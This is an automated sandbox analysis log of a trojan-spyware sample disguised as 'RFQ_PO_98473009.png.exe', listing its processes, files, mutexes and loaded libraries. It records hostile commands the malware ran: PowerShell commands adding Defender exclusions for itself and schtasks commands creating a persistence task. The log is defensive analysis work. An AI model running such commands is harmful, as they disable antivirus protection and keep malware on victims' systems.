Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, rGDpxZKaqlGF0mXsfS.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, rGDpxZKaqlGF0mXsfS.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, tJDSOWc3BWGGq4Qa2q.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, tJDSOWc3BWGGq4Qa2q.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, tJDSOWc3BWGGq4Qa2q.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, rGDpxZKaqlGF0mXsfS.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, rGDpxZKaqlGF0mXsfS.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, tJDSOWc3BWGGq4Qa2q.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, tJDSOWc3BWGGq4Qa2q.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, tJDSOWc3BWGGq4Qa2q.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@32/22@5/5
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe | Code function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 10_2_004019F0
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | File created: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe | Mutant created: \Sessions\1\BaseNamedObjects\WHevGRDjrEOC
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | File created: C:\Users\user\AppData\Local\Temp\tmp2D18.tmp
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe | Command line argument: 08A | 10_2_00413780
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe | Command line argument: 08A | 12_2_00413780
Source: RFQ_PO_98473009.png.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Native_New-Nova.exe, 0000000A.00000002.3627009294.000000000275C000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3627009294.000000000277A000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3627009294.000000000276C000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.000000000262D000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.000000000264B000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623925545.000000000263D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RFQ_PO_98473009.png.exe | Virustotal: Detection: 51%
Source: RFQ_PO_98473009.png.exe | ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | File read: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit | graph_9-91
Source: unknown | Process created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Process created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Process created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Process created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Process created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Process created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe | Process created: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe"
Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe | Process created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"
Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe | Process created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
